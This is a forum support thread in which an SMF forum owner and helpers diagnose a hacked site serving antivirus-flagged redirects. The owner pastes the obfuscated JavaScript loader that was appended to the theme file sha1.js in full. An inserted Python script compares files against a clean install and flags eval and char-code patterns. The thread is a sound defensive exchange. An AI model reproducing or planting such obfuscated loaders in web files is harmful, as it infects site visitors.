Link Scanner Alert. Threat was blocked

Started by briankstan, September 07, 2011, 03:25:08 PM


briankstan

I'm getting some reports from some of my forum members that there are some threats coming from my website. I've attached an image of the pop-up that is being received. The web address is different when it comes up again; the .cu.cc part is consistent in them, however.

Another report from another member is that Microsoft Security Essentials detects "Exploit:JS/Mult.DW".

I can't figure out what is going on. I'm running SMF version 1.1.14.

The website is www.saltlakemini-z.com

Any help would be greatly appreciated, thanks.

Kindred

1. Is it only specific threads?

If so, check the signatures of the users who posted in that thread.
If not, then check your php files and directories for recent additions....

Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

briankstan

It's not coming from specific threads. I didn't even get a warning using Firefox and AVG, but when I use IE it will pop up once in a while, usually when visiting the site and not logged in on the main page.

What would I be looking for in the .php files?

Illori

As a guest browsing your forum I get this; maybe that will help you figure out where the issue is.

briankstan

Thanks, I've replaced that file with the original file from the default theme. Hopefully that was it.

My problem is that I haven't been receiving the threat notices. Don't know why; I'm up to date with AVG.

Illori


briankstan

I did a compare of the 2 files; they were quite different, especially at the end of the file. The original file had a lot of code right on the last 3 lines. Here it is; would that have been the issue?

Next question is how did it get in there?

String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}

n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);

Illori

Try asking your host if they can find out.

briankstan

Thanks for your help. I hope that got it, and I'll follow up with my host to see if they can help me figure out how it got in there.

I've emailed a few of the members that have had the issue to check and see if that stops the issue. I'll report back.

Omniverse

This is the same attack that affected my site: a js file was changed and that bit of code tacked on.
The file on my site was mootools.js, which is used by TinyPortal.

This thread:
http://www.simplemachines.org/community/index.php?topic=451581.0

briankstan

I saw your thread. I looked for that file but didn't see it. Mine was also a .js file, but it was one of the theme files. Also the index.php file that was in the themes folder was infected.

Hopefully that was all. Everything seems to be working now without the virus warnings.

I also don't know how they got access. I talked with my IP but wasn't able to determine how it was done.

Illori



Illori

You have an oversold host; I would not be surprised if you have security issues on your server: someone else got hacked and they got access to your files as well. Check those files closely for any that have been modified.

Illori

Can you attach the file that was modified and caused the issue, if you still have it?

briankstan

Attached is the .js file. I don't have the index.php file, as my computer's antivirus software wouldn't let me download it from the server onto my computer. The bottom 3 lines are what was different.

I simply replaced the files with the ones that are included in the 1.1.14 full install.

The index.php file is in the folder yourdomain/forum/themes/
The sha1.js file is located in the folder yourdomain/forum/themes/default/
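One way to do the comparison briankstan describes, checking a live forum tree against a clean copy of the same release and then looking at the last few lines of anything added or changed for the kind of appended loader code posted earlier in the thread. This is an added example, not code from the thread or from SMF; the Themes/default/sha1.js path and the go.php name come from the thread, and the file contents in the fixture are constructed.

```python
import hashlib
import os
import re
import tempfile

# The loader posted above builds "fromCharCode" from fragments, so match the fragment and the "<num>-n," arrays.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "charcode-assembly": re.compile(r"fromC"),
    "offset-array": re.compile(r"(?:\d+-[a-z]\w*,){8,}"),
}

def file_hashes(root, exts=(".js", ".php")):
    out = {}  # relative path -> sha256 of every .js/.php file under root
    for dirpath, _, files in os.walk(root):
        for rel in (os.path.relpath(os.path.join(dirpath, f), root) for f in files if f.endswith(exts)):
            with open(os.path.join(root, rel), "rb") as fh:
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out

def suspicious_tail(path, last_lines=3):
    """Indicator names that fire in the last few lines, which is where appended code ends up."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        tail = "".join(fh.readlines()[-last_lines:])
    return sorted(name for name, rx in INDICATORS.items() if rx.search(tail))

def diff_tree(live_root, clean_root):
    """Compare the live tree against a pristine install copy and flag odd tails."""
    live, clean = file_hashes(live_root), file_hashes(clean_root)
    report = {
        "added": sorted(set(live) - set(clean)),
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
    }
    report["flagged"] = {p: suspicious_tail(os.path.join(live_root, p))
                         for p in report["added"] + report["modified"]}
    return report

def demo():
    """Constructed fixture: a clean theme file, a tampered live copy and a dropped go.php."""
    base = tempfile.mkdtemp()
    original = "function sha1(s){ /* original theme code */ }\n"
    tail = "var n=[1-n,2-n,3-n,4-n,5-n,6-n,7-n,8-n,9-n];eval(ss);\n"  # constructed stand-in
    fixture = {"clean/Themes/default/sha1.js": original,
               "live/Themes/default/sha1.js": original + tail,
               "live/Themes/go.php": "<?php /* constructed dropped file */ ?>\n"}
    for rel, text in fixture.items():
        os.makedirs(os.path.dirname(os.path.join(base, rel)), exist_ok=True)
        with open(os.path.join(base, rel), "w") as fh:
            fh.write(text)
    return diff_tree(os.path.join(base, "live"), os.path.join(base, "clean"))
```

On a real host, point diff_tree at the live forum root and at an unpacked copy of the same SMF release, and treat every added or modified file as something to read by hand, not only the ones the tail heuristic flags.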


Illori

Can you check your files for a "go.php" file?

Teal

We ran into the exact same issue as first posted. It turned out to be an "injection" in the following:

./Themes/default/sha1.js

Once it was removed, the problem went away.

Teal
www.overclockeddoc.com
www.hellzhawtdogz.com

Illori

Did you check if the added script was the exact same as was posted above?
